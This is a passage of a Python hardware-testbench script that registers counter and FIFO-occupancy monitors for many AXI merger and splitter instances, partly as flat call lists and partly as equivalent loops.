counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.d_win_fifo.int_count")
# These 4-way merger instances all expose the identical monitor signal set,
# so the hook-ups are generated in loops rather than written out by hand.
# The call order matches the original flat list exactly: per merger, the
# read-side counters and FIFOs first, then the write side.  Channel b is
# the only channel with an out_fifo; that asymmetry is preserved.
for merger in ("merge15", "merge2", "merge200", "merge201",
               "merge202", "merge203", "merge204", "merge205"):
    rd = f"tb.dut.{merger}.axi_rd_4_merger"
    wr = f"tb.dut.{merger}.axi_wr_4_merger"
    # read side: per-channel read counters, then AR/ID FIFO occupancy
    for ch in "abcd":
        counts += monitorStuff(f"{rd}.{ch}_rcount")
    for ch in "abcd":
        counts += monitorStuff(f"{rd}.{ch}_ar_fifo.count")
        counts += monitorStuff(f"{rd}.{ch}_ar_fifo.int_count")
        counts += monitorStuff(f"{rd}.{ch}_ids_fifo.next_count")
        counts += monitorStuff(f"{rd}.{ch}_ids_fifo.count")
    # write side: panic counters, B-response counters, then AW/B/win FIFOs
    for ch in "abcd":
        counts += monitorStuff(f"{wr}.panic_{ch}count")
    for ch in "abcd":
        counts += monitorStuff(f"{wr}.{ch}_bcount")
    for ch in "abcd":
        counts += monitorStuff(f"{wr}.{ch}_aw_fifo.count")
        counts += monitorStuff(f"{wr}.{ch}_aw_fifo.int_count")
        counts += monitorStuff(f"{wr}.{ch}_b_fifo.next_count")
        counts += monitorStuff(f"{wr}.{ch}_b_fifo.count")
        if ch == "b":
            # only channel b has an out_fifo in this design
            counts += monitorStuff(f"{wr}.b_out_fifo.next_count")
            counts += monitorStuff(f"{wr}.b_out_fifo.count")
        counts += monitorStuff(f"{wr}.{ch}_win_fifo.count")
        counts += monitorStuff(f"{wr}.{ch}_win_fifo.int_count")
# merge206 through merge213 expose an identical set of monitored signals,
# so walk them in a loop instead of listing every path by hand. Iteration
# order matches the original flat listing exactly: read-merger signals
# first, then write-merger signals. Note the asymmetry: only the b channel
# of the write merger has an out_fifo.
rd_signals = [f"{ch}_rcount" for ch in "abcd"]
for ch in "abcd":
    rd_signals += [f"{ch}_ar_fifo.count", f"{ch}_ar_fifo.int_count",
                   f"{ch}_ids_fifo.next_count", f"{ch}_ids_fifo.count"]

wr_signals = [f"panic_{ch}count" for ch in "abcd"]
wr_signals += [f"{ch}_bcount" for ch in "abcd"]
for ch in "abcd":
    wr_signals += [f"{ch}_aw_fifo.count", f"{ch}_aw_fifo.int_count",
                   f"{ch}_b_fifo.next_count", f"{ch}_b_fifo.count"]
    if ch == "b":  # only the b channel has an out_fifo
        wr_signals += ["b_out_fifo.next_count", "b_out_fifo.count"]
    wr_signals += [f"{ch}_win_fifo.count", f"{ch}_win_fifo.int_count"]

for merge in range(206, 214):
    base = f"tb.dut.merge{merge}"
    for sig in rd_signals:
        counts += monitorStuff(f"{base}.axi_rd_4_merger.{sig}")
    for sig in wr_signals:
        counts += monitorStuff(f"{base}.axi_wr_4_merger.{sig}")
# merge214, merge215, and merge3 through merge8 each monitor an identical
# grid of signals: per-channel (a-d) read counters and FIFO occupancies on
# the read-side merger, then panic counters, B-response counters, and
# per-channel FIFO occupancies on the write-side merger. Channel b alone
# exposes an out_fifo. The loops below emit exactly the same hierarchical
# paths, in exactly the same order, as the original explicit list.
for merger in ("merge214", "merge215", "merge3", "merge4",
               "merge5", "merge6", "merge7", "merge8"):
    rd = f"tb.dut.{merger}.axi_rd_4_merger"
    wr = f"tb.dut.{merger}.axi_wr_4_merger"
    # Read-side merger: per-channel read counters, then AR/IDs FIFO counts
    for ch in "abcd":
        counts += monitorStuff(f"{rd}.{ch}_rcount")
    for ch in "abcd":
        counts += monitorStuff(f"{rd}.{ch}_ar_fifo.count")
        counts += monitorStuff(f"{rd}.{ch}_ar_fifo.int_count")
        counts += monitorStuff(f"{rd}.{ch}_ids_fifo.next_count")
        counts += monitorStuff(f"{rd}.{ch}_ids_fifo.count")
    # Write-side merger: panic counters, B-response counters, FIFO counts
    for ch in "abcd":
        counts += monitorStuff(f"{wr}.panic_{ch}count")
    for ch in "abcd":
        counts += monitorStuff(f"{wr}.{ch}_bcount")
    for ch in "abcd":
        counts += monitorStuff(f"{wr}.{ch}_aw_fifo.count")
        counts += monitorStuff(f"{wr}.{ch}_aw_fifo.int_count")
        counts += monitorStuff(f"{wr}.{ch}_b_fifo.next_count")
        counts += monitorStuff(f"{wr}.{ch}_b_fifo.count")
        if ch == "b":
            # only channel b has an out_fifo in this merger
            counts += monitorStuff(f"{wr}.b_out_fifo.next_count")
            counts += monitorStuff(f"{wr}.b_out_fifo.count")
        counts += monitorStuff(f"{wr}.{ch}_win_fifo.count")
        counts += monitorStuff(f"{wr}.{ch}_win_fifo.int_count")
# merge9 read-side signals and write-side panic/B-response counters follow
# the same per-channel pattern; same signals, same order as the original
# explicit list.
rd9 = "tb.dut.merge9.axi_rd_4_merger"
wr9 = "tb.dut.merge9.axi_wr_4_merger"
for ch in "abcd":
    counts += monitorStuff(f"{rd9}.{ch}_rcount")
for ch in "abcd":
    counts += monitorStuff(f"{rd9}.{ch}_ar_fifo.count")
    counts += monitorStuff(f"{rd9}.{ch}_ar_fifo.int_count")
    counts += monitorStuff(f"{rd9}.{ch}_ids_fifo.next_count")
    counts += monitorStuff(f"{rd9}.{ch}_ids_fifo.count")
for ch in "abcd":
    counts += monitorStuff(f"{wr9}.panic_{ch}count")
for ch in "abcd":
    counts += monitorStuff(f"{wr9}.{ch}_bcount")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.d_win_fifo.int_count")
# Read- and write-splitter counters and FIFO depths for each splitter
# instance, monitored in the same order as before.
for split in ("split0", "split1", "split10", "split100", "split101",
              "split102", "split103", "split104", "split105", "split106",
              "split107", "split108", "split109", "split11", "split110",
              "split111"):
    rd = "tb.dut." + split + ".axi_rd_4_splitter."
    wr = "tb.dut." + split + ".axi_wr_4_splitter."
    counts += monitorStuff(rd + "ar_fifo.next_count")
    counts += monitorStuff(rd + "ar_fifo.count")
    counts += monitorStuff(rd + "r_fifo.next_count")
    counts += monitorStuff(rd + "r_fifo.count")
    for port in "abcd":
        counts += monitorStuff(wr + port + "_bcount")
    counts += monitorStuff(wr + "aw_fifo.next_count")
    counts += monitorStuff(wr + "aw_fifo.count")
    counts += monitorStuff(wr + "b_fifo.next_count")
    counts += monitorStuff(wr + "b_fifo.count")
    for port in "abcd":
        counts += monitorStuff(wr + "back_bid_" + port + "_fifo.count")
        counts += monitorStuff(wr + "back_bid_" + port + "_fifo.int_count")
    counts += monitorStuff(wr + "order_fifo.next_count")
    counts += monitorStuff(wr + "order_fifo.count")
    counts += monitorStuff(wr + "w_fifo.next_count")
    counts += monitorStuff(wr + "w_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split112.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split112.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split113.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split113.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split114.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split114.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split115.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split115.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split12.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split12.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split13.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split13.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split14.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split14.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.order_fifo.next_count")
